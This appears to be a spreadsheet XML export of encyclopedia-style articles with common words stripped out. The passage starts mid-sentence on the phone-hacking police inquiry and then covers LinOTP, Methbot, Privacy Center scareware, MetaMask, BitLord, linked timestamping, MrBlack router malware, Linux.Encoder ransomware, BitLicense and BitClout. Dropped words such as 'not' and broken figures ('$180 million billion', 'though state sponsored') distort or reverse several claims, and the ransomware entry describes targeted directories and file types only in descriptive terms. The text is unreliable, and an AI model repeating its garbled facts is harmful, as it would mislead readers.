bribery, corruption from 2003 2008, macdonald director public prosecutions (dpp) crown prosecution service (cps). during period, andy hayman metropolitan police service limited met's investigation alleged phone hacking clive goodman glenn mulcaire. john yates later claimed investigation limited result collaboration indicated broken unless voice messages listened phone hackers intended recipient listed them. macdonald recused strategy sessions acquaintance editor news world, andy coulson. november 2006, clive goodman pleaded guilty illegally acquiring confidential information royal household write stories news world. months later, goodman sentenced prison dismissed news world. filed wrongful dismissal suit, claiming part others well aware activities. this suit settled march 2007. news international, owner news world, selected emails goodman news world reporters editors asked firm harbottle lewis (h&amp;l) review report whether evidence others, including andy coulson, aware goodman's hacking engaged hacking themselves. also served counsel royal family time. 2007, h&amp;l's lawrence abramson sent final draft letter whose text negotiated firm client news international, stating review e-mails found evidence. testimony commons culture, media sport committee july 2011, news international's james murdoch claimed relied letter containing "outside legal advice senior counsel” publicly maintain phone hacking work single "rogue reporter," namely goodman. these emails time provided police.news international faced growing scepticism criticism newspapers, parliament, police single "rogue reporter" stance. there also questions illegal action police themselves. result, news international's parent company, news corporation arranged another review emails. 2011, firm, hickman rose, hired macdonald, still acquaintance former news world editor, andy coulson, review emails held since 2007. when macdonald reviewed e-mails, took less five minutes' conclude "blindingly obvious" represented evidence criminal wrongdoing. advised news corporation board give emails police, move current investigation payments made police journalists news world. company trawled documents, including cash authorization records, found 130,000 pounds’ worth payments group officers several years, according officials knowledge inquiry. included within records documentation thousand-pound cash withdrawal around date goodman's e-mail concerning purchase green book police officer."on june, macdonald gave papers reviewed relating allegations illegal payments police. july, guardian broke millie dowler story. july 2011, announced operation elveden initiated investigate alleged bribery corruption within metropolitan police. investigations metropolitan police initiated investigations, became object investigations others. investigative reporting newspapers early 2002, metropolitan police's anti-corruption unit engaged operation nigeria, guardian raised questions whether evidence relating police corruption pursued.between february 2004 april 2005, result operation glade, working private detective agencies charged crimes relating illegal acquisition confidential information. some information obtained reportedly came serving police officers. only four accused ultimately found guilty crimes serve prison time. guardian reported investigation prosecution ended fiasco since whittamore three others received conditional discharges. trial members collapsed even gotten started." guardian also observed enormous amounts information seized raids evaluated.after 2006 imprisonment clive goodman glenn mulcaire, assurances news international executive senior metropolitan police officials thorough investigation evidence identified involved phone hacking, public perception matter closed. nick davies journalists guardian continued critically examine evidence available court cases reported information contradicting official positions.other newspapers, including york times, daily telegraph independent, also published articles critical met's performance. these news media organizations persisted obtaining evaluating information court records, freedom information requests, field contacts, reportedly including police officers. case watergate scandal 1972, dogged investigative reporting public inquiries national oversight bodies, intensified police investigations, resignations senior enforcement officials. investigation national oversight bodies commons culture, media, sport select committee house commons culture, media sport committee held hearings regarding phone hacking news media companies march 2007, july 2009, july 2011. representatives metropolitan police service gave evidence committee several occasions, including oral evidence follows: september 2009 john yates, assis</t>
  </si>
  <si>
    <t>LinOTP</t>
  </si>
  <si>
    <t>linotp linux-based software manage authentication devices two-factor authentication time passwords. implemented service based python framework pylons. thus requires server linotp mainly developed german company keyidentity gmbh. core components licensed affero general public license. open source authentication server certified oath initiative open authentication version. overview service linotp provides rest-like api. functions accessed pylons controllers. responses returned json object. linotp designed modular enabling user store modules token modules. thus capable supporting wide range different tokens. features supported tokens:safenet etoken pass safenet safeword alpine motp lost token paper token feitian c-100 (hotp) feitian]] c-200 (totp) feitian c-300 (ocra) feitian c601 (optical ocra) authenex a-key yubico yubikey gemalto ezio token smartdisplayer nagraid 106/103 nagraid (ocra) token safesignature simple pass token remote token radius token tagespasswort token apps iphone android like google authenticator hotp/ totp ocra tokenyubikey mass enrollment support token databases like sqlite, mysql, postgresql, oracle, management interface command line client users stored flat files module saml openid freeradius connection rlm_perl selfservice import token files management functions:enroll/assign tokens synchronize, resynchronize, automatic resychronization activate/deactivate/delete tokens autoassignment lost token scenario find token value valuedetailed policies definitions sophisticated audit multitenancy source code being written python program comes source code. also references</t>
  </si>
  <si>
    <t>Methbot</t>
  </si>
  <si>
    <t>methbot advertising fraud scheme. history methbot first tracked 2015 cybersecurity firm white ops, botnet rapidly increased activity 2016. botnet originated russia (though state sponsored), utilized foreign computers networks europe north america. infrastructure consisted 571,904 dedicated ips, 6,000 domains, 250,267 distinct urls, could house video used variants names famous publishers fool looking domains. this operators game system, leading selection algorithms select fake pages larger corporate pages legitimate companies, charge advertisers premium. about 570,000 bots used execute clicks websites, “watching” million video bots mimicked normal computer user behavior. estimated clicks generally reached million day. botnet relied data servers instead traditional botnets rely infected mobile devices.at peak, methbot making operators—which dubbed fraud komanda—up three five million dollars $180 million billion dollar losses industry, estimates nearer half million day. time, largest profitable fraud network established, discovered late 2016. references</t>
  </si>
  <si>
    <t>Privacy Center</t>
  </si>
  <si>
    <t>privacy center form scareware hijacks microsoft windows operating systems. masquerades spyware remover, performs fake system scans report (fake) infections persuades user purchase "full version" privacy center remove reported infections protect future infections. appears green system tray icon often takes screen blocks desktop, including start icon. unlike rogue anti-viruses, privacy center capability running safe mode. attempts close system tray futile. also, system often acknowledge insertion flash drive. method infection virus installed users click fake video codec "required" play online "movie". once user clicks codec, privacy center installed opposed video playing. also installed users click scripts rogue security software sites. august 2009, reported privacy center embed another rogue anti-virus called antispyware 2010. references</t>
  </si>
  <si>
    <t>Link Motion Inc</t>
  </si>
  <si>
    <t>link motion inc, formerly netqin mobile, multinational technology company develops, licenses, supports sells software services focus smart ride business. link motion sells carputers businesses, consumer ride sharing services, well legacy mobile security, productivity related applications. link motion maintains dual headquarters dallas, texas, united states beijing, china. court receiver, lawyer robert seiden, appointed link motion february 2019 united states federal district court southern district york judge victor marrero. receiver removed wenyong “vincent” chairman chief executive officer, replaced appointing lilin “francis” guo. history 2005–2011: founding company beginnings link motion founded mobile 2005 henry lin, formerly youngest associate professor beijing university posts telecommunications, vincent shi. company began business offering mobile security services later started offering productivity products families enterprise customers. their services compatible wide range handset models almost currently available operating systems smartphones, including ios, android, windows phone blackberry mobile also collaborated closely mobile ecosystem participants, including chipmakers, handset manufacturers, wireless carriers, third party payment channels, retailers distribution channels order broaden reach services. mobile's initial focus china marketplace. company cooperated china mobile, china unicom china telecom, three largest mobile companies china. mobile also cooperated nokia sony pre-installed products companywide mobile phones. mobile also worked closely symbian, windows mobile android, developing mobile security applications based operating systems. addition, samsung, motorola, dopod, lenovo, tencent, baidu company's partners. august 2011, chris stier appointed managing director americas became responsible mobile's business development throughout americas, overseeing sales marketing operations well establishing strategic partnerships industry players region.in october 2011, geoff casely appointed managing director europe, middle east, africa (emea) region based london became responsible mobile's business development emea building strategic partner relationships. 2012–2013: international expansion omar khan joined company january 2012 co-ceo direct company alongside current chairman chief executive officer henry company changed corporate name netqin mobile inc. mobile inc. khan focused global expansion mobile markets north america, latin america, europe, japan, korea india. continued focus core markets china taiwan among developing countries. during first half 2012, mobile expanded international management additions gavin chief product officer, titus, senior director communication, conrad edwards chief experience officer, victoria repice senior director product management.nq mobile expanded mobile internet services november 2012 acquisition feiliu. feiliu founded 2009 subsequently rebranded mobile. leading mobile interest-based community platform coverage china engages users real-time mobile online activities. mobile provides application recommendation services, interest-based exchanges, mobile games user communities. according data published third party marketing research company sino mobile mobile game publisher operator chinese market december 2012. mobile 87.3 million registered users 16.1 million monthly active users june 2013.enfodesk analysys international (enfodesk), major market tracking company, reported mobile became number publisher platform increased market share 36.6 percent first half 2013. first-place ranking included spot revenues number mobile users. report also claims mobile ranks third place across platforms revenues mobile users maintains 18.8 percent share total revenues first half 2013. mobile also expanded enterprise security products services starting 2012 acquired nationsky remaining july 2013. founded 2005, nationsky leader providing mobile services 1,250 enterprises china. working carriers smart phone platform providers, nationsky delivers device agnostic managed mobile services, self developed mobile device management (mdm) software nqsky mobile saas services. headquartered beijing, nationsky also offices shanghai shenzhen. june 2013, mobile hired matt mathison senior management position vice president, capital markets.in august 2013, mobile opened second global headquarters dallas, texas. company also expanded products service offerings acquisitions shanghai yinlong information technology co., ltd. ("yinlong") develop content-based music information retrieval (mir) technology based multi platforms, mobile (shenzhen) co., ltd. ("nq shenzhen") offer online security education value added services, best partners ltd. ("best partner") mobile advertising, beijing tianya co., ltd. ("tianya") mobile healthcare applications development search engine marketing healthcare industry china, chengdu ruifeng technology co., ltd. ("ruifeng") provide enterprise mobility system development training programs, tianjin huayong wireless technology co., ltd. ("huayong research development marketing live wallpapers smart phones using android operating system, expanded market mobile ("nq japan") japan. 2014–2015: consolidation divestments 2014 mobile continued expanding acquisitions beijing trustek technology co., ltd. ("trustek") provide enterprise mobility services, including system management, application development, business intelligence maintenance services, yipai tianxia network technology co., ltd. ("yipai") provide mobile intelligent interactive advertising services, integration media channels outdoor, newspapers, magazines etc., beijing showself technology co., ltd. ("showself") provide entertainment dating platforms mobile internet, established beijing mobile co., ltd. ("nq yizhuang") engage software design development computer mobile devices technology consulting services. company also took controlling stake link motion.in 2015, zemin took company held press conference beijing announce business strategy reorganized along lines, technical division representing mobile security, mobile enterprise mobile health care, entertainment division covering mobile advertising, mobile entertainment mobile games. during conference mobile also announced showself entertainment brand includes showself, showself live wallpaper, showself music radar showself launcher. june 2015, roland appointed chief financial officer.in august 2015 company along existing shareholders mobile inc. agreed sell beijing jinxing rongda investment management ltd., subsidiary tsinghua holdings co., ltd, entire stake mobile inc. currently hold less billion approximately less us$626 million) also sale mobile's interest beijing nationsky network technology co., ltd., shuli, founder senior management member beijing nationsky, aggregate consideration us$80 million. company completed divestment nationsky million 2015. 2016–present: business transformation throughout 2016 mobile continued consolidate began shifting core business smart cars working divestments mobile businesses. march 2017, company announced agreement sell mobile billion along beijing showself 1.23 million tongfang investment fund series spc, affiliate tsinghua tongfang. divestment mobile beijing showself completed december 2017.in january 2018, mobile announced board directors approved rebranding effort around focus vehicular automation mobility service company change name mobile inc.” “link motion inc.” ticker “nq” “lkm.”in february 2018, company hired group investor relations financial communications across markets changed name link motion inc. ticker lkm.in march 2018, link motion inc. appointed tang executive vice president head company's smart ride business.in february 2019, federal court york appointed robert seiden, lawyer former prosecutor, receiver link motion preserve assets company. seiden also appointed receiver subsidiaries hong kong high court hong kong special administrative region court first instance, along lauren klc. receiver removed wenyong “vincent” chairman chief executive officer link motion replaced appointing lilin “francis” guo. products mobile value added services freemium products including mobile security applications, vault family guardian. advertising revenue sources include third-party application referrals mobile applications, banner intelligent interactive advertising services user modeling image recognition technology search advertisers’ products services potential interest. enterprise mobility trustek offers mobility strategy consulting, architecture design, hardware software procurement deployment, mobile device application management, training, maintenance ongoing support services enterprise customers. timeline events 2005–2011 october 2005, company launched first mobile security product netqin 1.0.in november 2009, 2009 china frost sullivan award mobile security market leadership year presented netqin tech. co., ltd. (netqin) leading market share china mobile security market, continued commitment excellence r&amp;d, outstanding contribution industry.deloitte technology ranked company fast china program growth 1687% past three years october, 2010.in 2011, company announced initial public offering 7,750,000 american depositary shares ("adss"), representing five class common shares company, priced $11.50 ads, total offering size us$89.125 million, assuming exercise over-allotment option.on 2011, mobile started trading york stock exchange (nyse) symbol “nq”.in july 2011, mobile reached million registered users nearly 100% growth since june, 2010 signed framework agreement telefónica, s.a. (telefónica) provide mobile internet services subscribers telefónica. under agreement, mobile's mobile internet services integrated telefónica's subsidiary's store mobile devices distributed telefónica subsidiaries.in september 2011, mobile brightstar corp. signed global go-to-market agreement promote adoption mobile security products. company also opened mobile security research center based raleigh, n.c. xuxian jiang, appointed chief scientist. 2012–2015 january 2012, netqin launched mobile" brand, conducts international business, announced plans change company's corporate name netqin mobile inc. mobile inc. company also signed agreement pre-install mobile security motorola android smartphones china released version antivirus software, mobile security v6.0 android.in february 2012, mobile integrated bluevia payment telefónica, providing mobile payment option telefónica's subscribers.in april 2012, mobile announced cellular connection (tcc) offer mobile security verizon wireless premium retail locations across u.s. rollout program begin availability tcc's nearly corporate stores.in 2012, mobile visited nyse celebrate company's 1-year anniversary listing nyse. honor occasion, omar khan lin, co-ceos mobile, rang closing bell. company also acquired beijing nationsky network technology, inc. ("nationsky"), provider mobile services enterprises china signed collaboration agreement wireless offer mobile guard verizon wireless premium retail locations us.in august 2012, mobile mediatek inc. reached agreement regarding mobile's acquisition approximately one-third interest hesine technologies international worldwide inc. ("hesine"), wholly owned subsidiary mediatek premier mobile messaging provider. mobile's co-founder, chairman co-ceo, henry joined board directors hesine. company also announced launch mobile vault iphone.in september 2012, mobile announced launch family guardian.in november 2012, acquired beijing feiliu jiutian technology ("feiliu") later rebranded mobile. company also announced epay australia, division euronet worldwide, inc. (nasdaq: eeft), offer mobile guard major retail locations across australia, including harvey norman allphones, retailer phones offer mobile security retail locations across uk.in december 2012, mobile announced launch proprietary security check service htc's store mainland china.in july 2013, mobile agrees purchase remaining percent stake subsidiary, nationsky.in september 2013, mobile announced release "music radar," content-based music information retrieval (mir) application subsidiaries, yinlong making available china android platforms. later renamed doreso.in october 2013, nq's stock “fell shattering percent”, followed lawsuits. short-seller research firm muddy waters alleged least percent company’s revenue china fictitious actual market share china percent instead percent claimed". independent investigation conducted independent special committee board directors carried independent counsel shearman sterling deloitte touche financial advisory services limited acting forensic accountants found companies disclosures verifiable. however, april 2015, co-ceo mobile, omar khan, stepped stock fallen nearly percent. reception mobile security family guardian selected apps mobile apps showdown 2013 december, 2012. mobile granted 2011 technology pioneer award world economic forum technology leadership innovation mobile security. “the company’s heavy investment resulted patented patent-pending technologies, giving company leading edge burgeoning mobile security market.” time magazine named company start-ups that will change your life” september, 2010. mobile security selected global mobile internet conference silicon valley (gmic october, 2012. addition, mobile vault android selected app. deloitte technology fast (2010) reviews analysis products mobile security received stars reviewed advisor.nq mobile vault received star, cnet magazines.in april 2015 analysis vault product indicated encrypted first bytes data, leaving rest unencrypted. mobile responded saying encryption level "appropriate". partnerships august 2011, mobile mediatek reached agreement mobile security cooperation whereby mediatek make mobile's mobile security service available mediatek's smartphone chipset. company also signed agreement taiwan mobile provide mobile anti-virus services taiwan mobile subscribers taiwan.in june 2012, mobile announced alliance tdmobility, joint u.s. venture brightstar corp tech data corporation. collaboration enable tdmobility bring enterprise shield tech data's network 65,000 value added resellers across serving small, medium, large businesses. company also announced official global launch enterprise shield scientists mobile's mobile security research center, collaboration north carolina state university disclosed detect mobile threats without relying known malware samples signatures.in october 2012, mobile announced applications, including mobile guard, mobile vault android family guardian, offered gowireless wireless verizon wireless premium retail locations across united states. references</t>
  </si>
  <si>
    <t>Metadata removal tool</t>
  </si>
  <si>
    <t>metadata removal tool metadata scrubber type privacy software built protect privacy users removing potentially privacy-compromising metadata files shared others, e.g., sending e-mail attachments posting web. overview metadata found many types files documents, spreadsheets, presentations, images, audio files. they include information details file authors, file creation modification dates, geographical location, document revision history, thumbnail images, comments. metadata added files users, metadata often automatically added files authoring applications devices used produce files, without user intervention. since metadata sometimes clearly visible authoring applications (depending application settings), risk user unaware existence forget and, file shared, private confidential information inadvertently exposed. purpose metadata removal tools minimize risk data leakage.the metadata removal tools exist today divided four groups: integral metadata removal tools, included applications, like document inspector microsoft office. batch metadata removal tools, process multiple files. e-mail client add-ins, designed remove metadata e-mail attachments sent. server based systems, designed automatically remove metadata network gateway.to securely delete metadata file, important linearize file afterwards, otherwise changes reversible metadata recovered.metadata removal tools also commonly used reduce overall sizes files, particularly image files posted web. example, small image website, contain metadata including thumbnail image, easily contain much metadata image data, thus removal metadata halve file size. also data loss prevention software exif sanitization (classified information) references</t>
  </si>
  <si>
    <t>MetaMask</t>
  </si>
  <si>
    <t>metamask software cryptocurrency wallet used interact ethereum blockchain. allows users access ethereum wallet browser extension mobile app, used interact decentralized applications. metamask developed consensys software inc., blockchain software company focusing ethereum-based tools infrastructure. overview metamask allows users store manage account keys, broadcast transactions, send receive ethereum-based cryptocurrencies tokens, securely connect decentralized applications compatible browser mobile app's built-in browser.websites decentralized applications able connect, authenticate, and/or integrate smart contract functionality user's metamask wallet (and similar blockchain wallet browser extensions) javascript code allows website send action prompts, signature requests, transaction requests user metamask intermediary.the application includes integrated service exchanging ethereum tokens aggregating several decentralized exchanges (dexs) find best exchange rate. this feature, branded metamask swaps, charges service 0.875% transaction amount.as november 2021, metamask's browser extension million monthly active users, according bloomberg. history metamask created consensys 2016.prior 2019, metamask available desktop browser extension google chrome firefox browsers. given popularity metamask among cryptocurrency users, lack official mobile several years, instances malicious software posing metamask became problematic google regulating chrome store google play platforms. instance, google play unintentionally removed metamask's official beta reverting decision week later january 2020.starting 2019, metamask began releasing mobile versions closed beta testing, followed official public release android september 2020.during october 2020, metamask swaps, built-in aggregation service added desktop extension. product became available mobile devices march 2021. criticism while metamask "web3" focused applications decentralize control personal data increase user privacy, critics pointed potential metamask's browser extension leak identifiable information data collection networks trackers fundamental flaw. also coinbase web3 references</t>
  </si>
  <si>
    <t>BitLord</t>
  </si>
  <si>
    <t>bitlord proprietary potentially unwanted adware bittorrent client microsoft windows, macos android. history bitlord first released december 2004, bitlord 0.56, based license bitcomet. from version 2.3.2, bitlord based deluge, added several features since then. bitlord version 2.4) built using python cross-platform framework, uses libtorrent-rasterbar library. malicious behavior upon download, bitlord download many programs files, mypc backup regclean pro, often cited adware browser hijackers. also change default search engine conduit search. references external links bitlord website</t>
  </si>
  <si>
    <t>Linked timestamping</t>
  </si>
  <si>
    <t>linked timestamping type trusted timestamping issued time-stamps related other. description linked timestamping creates time-stamp tokens dependent other, entangled authenticated data structure. later modification issued time-stamps would invalidate structure. temporal order issued time-stamps also protected data structure, making backdating issued time-stamps impossible, even issuing server itself. authenticated data structure generally published hard-to-modify widely witnessed media, like printed newspaper public blockchain. there (long-term) private keys use, avoiding pki-related risks. suitable candidates authenticated data structure include: linear hash chain merkle tree (binary hash tree) skip listthe simplest linear hash chain-based time-stamping scheme illustrated following diagram: linking-based time-stamping authority (tsa) usually performs following distinct functions: aggregation increased scalability might group time-stamping requests together arrive within short time-frame. these requests aggregated together without retaining temporal order assigned time value. aggregation creates cryptographic connection involved requests; authenticating aggregate value used input linking operation.linking linking creates verifiable ordered cryptographic link current already issued time-stamp tokens. publishing periodically publishes links, previously issued time-stamp tokens depend published link practically impossible forge published values. publishing widely witnessed links, creates unforgeable verification points validating previously issued time-stamps. security linked timestamping inherently secure usual, public-key signature based time-stamping. consequential time-stamps "seal" previously issued ones hash chain authenticated dictionary use) could built way; modifying issued time-stamps nearly hard finding preimage used cryptographic hash function. continuity operation observable users; periodic publications widely witnessed media provide extra transparency. tampering absolute time values could detected users, whose time-stamps relatively comparable system design. absence secret keys increases system trustworthiness. there keys leak hash algorithms considered future-proof modular arithmetic based algorithms, e.g. rsa. linked timestamping scales well hashing much faster public cryptography. there need specific cryptographic hardware limitations. common technology guaranteeing long-term attestation value issued time-stamps (and digitally signed data) periodic over-time-stamping time-stamp token. because missing key-related risks plausible safety margin reasonably chosen hash function over-time-stamping period hash-linked token could order magnitude longer public-key signed token. research foundations stuart haber scott stornetta proposed 1990 link issued time-stamps together linear hash-chain, using collision-resistant hash function. main rationale diminish trust requirements. tree-like schemes operating rounds proposed benaloh mare 1991 bayer, haber stornetta 1992.benaloh mare constructed one-way accumulator 1994 proposed time-stamping. when used aggregation, one-way accumulator requires constant-time computation round membership verification. surety started first commercial linked timestamping service january 1995. linking scheme described security analyzed following article haber sornetta. buldas continued optimization formal analysis binary tree threaded tree based schemes. skip-list based time-stamping system implemented 2005; related algorithms quite efficient. provable security security proof hash-function based time-stamping schemes presented buldas, saarepera 2004. there explicit upper bound {\displaystyle number time stamps issued aggregation period; suggested probably impossible prove security without explicit bound so-called black-box reductions fail task. considering known practically relevant efficient security proofs black-box, negative result quite strong. next, 2005 shown bounded time-stamping schemes trusted audit party (who periodically reviews list time-stamps issued aggregation period) made universally composable remain secure arbitrary environments (compositions protocols instances time-stamping protocol itself). buldas, laur showed 2007 bounded time-stamping schemes secure strong sense satisfy so-called "knowledge-binding" condition. security guarantee offered buldas, saarepera 2004 improved diminishing security loss coefficient {\displaystyle {\displaystyle {\sqrt {n}}} hash functions used secure time-stamping schemes necessarily collision-resistant even one-way; secure time-stamping schemes probably possible even presence universal collision-finding algorithm (i.e. universal attacking program able find collisions hash function). this suggests possible find even stronger proofs based properties hash functions. illustration hash tree based time-stamping system works rounds {\displaystyle {\displaystyle t+1} {\displaystyle t+2} ...), aggregation tree round. capacity system {\displaystyle determined tree size {\displaystyle n=2^{l}} {\displaystyle denotes binary tree depth). current security proofs work assumption hard limit aggregation tree size, possibly enforced subtree length restriction. standards 18014 part covers 'mechanisms producing linked tokens'. american national standard financial services, "trusted timestamp management security" (ansi x9.95 standard) june 2005 covers linking-based hybrid time-stamping schemes. there ietf standard draft linking based time-stamping. 4998 (evidence record syntax) encompasses hash tree time-stamp integrity guarantee long-term archiving. references external links "series mini-lectures cryptographic hash functions"; includes application time-stamping provable security; buldas, 2011.</t>
  </si>
  <si>
    <t>Linux Spike Trojan malware</t>
  </si>
  <si>
    <t>linux spike trojan malware, widely known mrblack, type malware infects routers, eventually spreads routers. incapsula, internet security firm, first malware december 2014. this tool prone attack devices still default credentials. "bot" type malware allows attacker take control affected computer. also known "web robots," bots usually part network infected machines, known "botnet," typically made victim machines stretch across globe.once router infected, attack injects malware order configure ddos attacks. used mitm attacks, cookie hijacking attacks targeted router infected. mrblack regarded widespread malware varieties infecting forty thousand routers. references</t>
  </si>
  <si>
    <t>Linux.Encoder</t>
  </si>
  <si>
    <t>linux.encoder (also known elf/filecoder.a trojan.linux.ransom.a) considered first ransomware trojan targeting computers running linux. there additional variants trojan target unix unix-like systems. discovered november 2015, web, malware affected least tens linux users.linux.encoder.1 remotely executed victim's computer using flaw magento, popular content management system app. when activated, malware encrypts certain types files stored mounted local network drives using public-key cryptography, private stored malware's control servers. malware store file called "readme_to_decrypt.txt" every directory, containing message, offers decrypt data payment (through bitcoin) made. compared ransomware cryptolocker, malware state deadline ransom increase time. discovery november 2015, web, russian anti-malware company added virus database linux.encoder.1. company published malware description after. this ransomware written using polarssl library. operation propagation according bitdefender labs, common infection vector flaw magento, shopping cart software. checkpoint, reported vulnerability april 2015. after report, magento issued fix. however, small e-commerce sites apply critical update. linux host might also attacked using exploits. file encryption encrypted files when root, program loads files memory containing attackers' demands: ./readme.crypto ./index.cryptoafter ransomware receives public key. malware start daemon delete original files. trojan encrypt files extensions ".php", ".html", ".tar", ".gz", ".sql", ".js", ".css", ".txt" ".pdf", ".tgz", ".war", ".jar", ".java", ".class", ".ruby", ".rar" ".zip", ".db", ".7z", ".doc", ".pdf", ".xls", ".properties", ".xml" ".jpg", ".jpeg", ".png", ".gif", ".mov", ".avi", ".wmv", ".mp3" ".mp4", ".wma", ".aac", ".wav", ".pem", ".pub", ".docx", ".apk" ".exe", ".dll", ".tpl", ".psd", ".asp", ".phtml", ".aspx", ".csv". malicious program encrypts files aforementioned extensions following directories: /home /root /var/lib/mysql /var/www /etc/nginx /etc/apache2 /var/logafter this, malware encrypt files directories name starting public_html webapp backup .git .svnthe program encrypt files following directories /root/ .ssh /usr/bin /bin /etc/ssh program generate file called "readme_for_decryption.txt" every folder. this file contains bitcoin address generated specifically ransom website download decrypting tool hosted .onion website. encryption method like ransomware, linux.encoder.1 mixed-encryption algorithms encrypt data. starts generating victim's device encrypts previous files using aes-cbc-128. then rsa-encrypted prepended beginning every encrypted file, original file permissions used algorithm. encrypted files ".encrypted" added file name.the program libc rand() function timestamp moment encryption seed generate keys. decryption when payment cybercriminal made, victim download script computer. this script private recover symmetric decrypt files ".encrypted" extension. along file decryption, decryption tool also delete every "readme_for_decryption.txt" file hard drive. recovering files because timestamp seed creating keys encryption, decryption files encrypted ransomware trivial given original timestamp information kept intact. researchers bitdefender labs found exploited weakness recover files without criminals. unix systems linux.encoder.1 recompiled mac, called keranger. there version infects freebsd. references</t>
  </si>
  <si>
    <t>BitLicense</t>
  </si>
  <si>
    <t>bitlicense common term used business license virtual currency activities, issued york state department financial services (nysdfs) regulations designed companies. regulations limited activities involving state york york resident. people residing located place business conducting business state york count york residents regulations. license introduced designed benjamin lawsky, york's first superintendent financial services, july 2014. chartered entities require explicit bitlicense, instead proceed virtual currency activities limited purpose trust charters approved nydfs. overview regulations define virtual currency business activity following types activities: receiving virtual currency transmission transmitting virtual currency, except transaction undertaken non-financial purposes involve transfer nominal amount virtual currency; storing, holding, maintaining custody control virtual currency behalf others; buying selling virtual currency customer business; performing exchange services customer business, controlling, administering, issuing virtual currency.the following activities excluded definition virtual currency business activity: development dissemination software itself; merchants consumers utilize virtual currency solely purchase sale goods services investment purposes. history july 2014, department released details proposed "bitlicense", places regulations company person uses cryptocurrencies residing york. proposed regulations officially published york state register july beginning 45-day comment period. february 2015, revised proposal notice published, beginning another 30-day comment period.it came effect august 2015. least bitcoin companies announced stopping business york state regulations. york business journal called "great bitcoin exodus".in september 2015, boston-based circle granted first bitlicense, although december 2016 company pivoted away bitcoin exchange focus payments.two virtual currency limited purpose trust company charters approved nydfs 2015, first 2015 itbit, paxos trust company, second charter october 2015 gemini.in october 2015, article filed supreme court state york challenging authority york state department financial services define virtual currency. justice george heard case october 2017 dismissed case december 2017. case currently appeal.on june 2016, llc, affiliate ripple labs, approved bitlicense.on march 2017, coinbase awarded second bitlicense.in november 2017, tokyo based bitflyer awarded fourth bitlicense genesis global trading awarded fifth bitlicense 2018.in june 2018, hong kong based xapo awarded sixth bitlicense square, inc. awarded seventh bitlicense.bitpay awarded eighth bitlicense july 2018.in november 2018, texas-based coinsource, operator bitcoin teller machines, awarded twelfth virtual currency license charter.in november 2018, york-based institutional bitcoin provider nydig awarded bitlicense.in january 2019, robinhood crypto llc, subsidiary robinhood markets inc., moon inc., libertyx awarded bitlicense.on april 2019 bitstamp usa, inc., subsidiary bitstamp ltd. awarded bitlicense.one later, nydfs rejected bittrex's application, citing concerns capital requirements anti-money laundering controls.on december 2019, sofi digital assets, llc, subsidiary social finance, inc. awarded bitlicense well money transmitter license.on december 2019, nydfs proposed revision bitlicense whereby licensee offer coin public list nydfs website. revision still pending.in 2020, eris clearing, llc, subsidiary erisx, secured virtual currency license. june 2020, proposed conditional licensing framework makes easier start-ups enter york market. under proposed conditional licensing framework, entities apply conditional license partnering existing entity authorized engage virtual currency business activity.on october, 2020, paypal first entity approved conditional license partnership paxos trust company. references external links virtual currencies (part title york codes, rules regulations bitlicense frequently asked questions from nysdfs</t>
  </si>
  <si>
    <t>BitClout</t>
  </si>
  <si>
    <t>bitclout open source blockchain-based social media platform. platform, users post short-form writings photos, award money posts particularly like clicking diamond icon, sell "creator coins" (personalized tokens whose value depends people's reputations), create sell non-fungible tokens. bitclout runs custom proof work blockchain, prototype built deso (short "decentralized social"). bitclout's founder primary leader known pseudonymously "diamondhands" (slang person holds investment turbulent market); real name nader al-naji. under development since 2019, bitclout's blockchain created first block january 2021, bitclout launched publicly march 2021. platform launched 15,000 "reserved" accounts move intended prevent impersonation, backfired people reserved accounts tried actively distance themselves. supply bitclout's token fixed june 2021. bitclout prototype built deso blockchain. history origins (2019 march 2021) early 2019, nader al-naji became interested "mixing investing social media". started creating custom blockchain 2019, tell anyone else november 2020. however, fall 2020, al-naji pitched bitclout's investors real name began posting listings "new operation".although bitclout originally intended launch mid-2021, development sped "zeitgeist decentralized social media" "this news gamestop ignited trend towards investing social thing" january 2021.bitclout's first block mined january 2021. next block mined march 2021; mining sped point. bitclout (march september 2021) early march 2021, fifty investors received links password-protected website bitclout white paper. they encouraged explore site send link "two three 'trusted contacts'". within weeks users spending millions dollars platform. platform's founders said "completely unprepared", planned "soft-launch".on march 2021, bitclout launched private beta. investors include sequoia capital, andreessen horowitz, venture capital firm social capital, coinbase ventures, winklevoss capital management, alexis ohanian, polychain, pantera, digital currency group (coindesk's parent company).on june 2021, supply bitclout capped around million coins. from point, coin value determined supply demand.on july 2021, bitclout added ability users mint purchase nfts within platform. part deso (september 2021 present) september 2021, revealed bitclout prototype built deso, short "decentralized social". part revelation, diamondhands confirmed identity nader al-naji. bitclout project raised $200m funding, went setting deso foundation. overview bitclout social media platform. users post short-form writings photos (similarly twitter). they award money posts particularly like clicking diamond icon (similarly twitch bits). prices account's "creator coin" goes popularity celebrity behind example, someone says something negative, value corresponding account down. this price computed automatically according formula .003 {\displaystyle price\_in\_bitclout=.003*creator\_coins\_in\_circulation^{2}} launch time, bitclout scraped 15,000 profiles celebrities twitter create "reserved" accounts names. claim reserved account, account holder would need tweet (which also serves marketing strategy). platform's founder diamondhands states done prevent handle squatting user impersonation". least reserved profiles claimed.bitclout uses proof work, planning switch proof stake. controversies bitclout's development team made concerted efforts remain pseudonymous. leader goes name "diamondhands" platform. however, early april 2021, widely believed diamondhands former google software engineer nader al-naji. september 2021, nader al-naji interviewed fast company real name, confirming indeed diamondhands.during initial launch, bitclout could independently mined source code published, leading claims decentralization disputed. bitclout coins could bought bitcoin, could sold platform; users could sell sites like discord servers twitter threads. however, 2021, diamondhands announced 100% bitclout code went public, code bitclout.com became available github.some people reserved accounts actively tried distance bitclout platform. example, march 2021, firm anderson kill p.c. sent nader al-naji, presumed leader bitclout platform, cease-and-desist letter, demanding removal brandon curtis's account alleging bitclout violated sections 1798 3344 california civil code using curtis's name likeness without consent. curtis also tweeted, "adopting bitcoin's aesthetic raise funding carry unethical blatantly illegal schemes like bitclout: cool". (however, curtis's coin, despite listed official website, still bought users searching original username.) additionally, april 2021, hsien loong asked name photograph removed site, stating "nothing platform" misleading done without [his] permission".a single bitcoin wallet related bitclout received $165m worth deposits. references external links bitclout official website</t>
  </si>
  <si>
    <t>Pikachu virus</t>
  </si>
  <si>
